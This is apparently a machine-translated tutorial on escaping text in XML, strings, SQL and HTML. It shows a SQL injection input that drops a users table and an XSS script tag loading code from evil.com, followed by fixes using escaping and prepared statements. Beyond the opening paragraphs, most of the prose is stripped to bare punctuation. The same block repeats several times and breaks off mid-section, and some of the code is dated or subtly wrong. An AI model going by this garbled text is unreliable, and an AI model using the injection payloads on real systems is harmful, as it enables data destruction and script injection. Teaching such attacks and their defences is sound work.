主な問題
これは単なるテキストです。 はい、ただのテキスト-これが主な問題です。 コンピューターシステムのほとんどすべてはテキストで表されます(テキストはバイトで表されます)。 一部のテキストはコンピューター向けであり、他のテキストは人向けです。 しかし、それらとテキストの両方はまだテキストのままです。 私が話していることを理解するために、小さな例を挙げます。
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Suppose, there is the English text, which I don't wanna translate into Russian </contents> </article>
信じないでください:これはテキストです。 XMLと呼ぶ人もいますが、それは単なるテキストです。 英語の先生に見せることには適さないかもしれませんが、それはまだ単なるテキストです。 あなたはそれをポスターに印刷して会議に行くことができます、あなたはあなたの母親への手紙にそれを書くことができます...これはテキストです。
ただし、このテキストの特定の部分にコンピューターにとって何らかの意味を持たせたいと考えています。 コンピューターがテキストの作成者とテキスト自体を別々に抽出できるようにして、何かを実行できるようにします。 たとえば、上記を次のように変換します。
Suppose, there is the English text, which I don't wanna translate into Russian by Homo Sapiens
コンピューターはどのようにしてこれを行うのですか? それは、テキストの特定の部分を、
などの面白いかっこで囲まれた特別な単語で非常に適切にラップしているためです。 これを行ったので、これらの特定の部分を検索し、テキストを抽出し、独自の発明のいくつかに使用するプログラムを作成できます。
言い換えれば、テキスト内の特定のルールを使用して、同じルールを遵守する誰かが使用できる特別な意味を示しています。
さて、これは理解するのがそれほど難しくありません。 しかし、テキストで特別な意味を持つこれらの面白い括弧を使用したいが、この値を使用しない場合はどうでしょうか?..このようなもの:
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
文字「<」および「>」は特別なものではありません。 上記の例のように、それらはどこでも、どんなテキストでも合法的に使用できます。 しかし、私たちのような特別な言葉のアイデアはどうですか
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
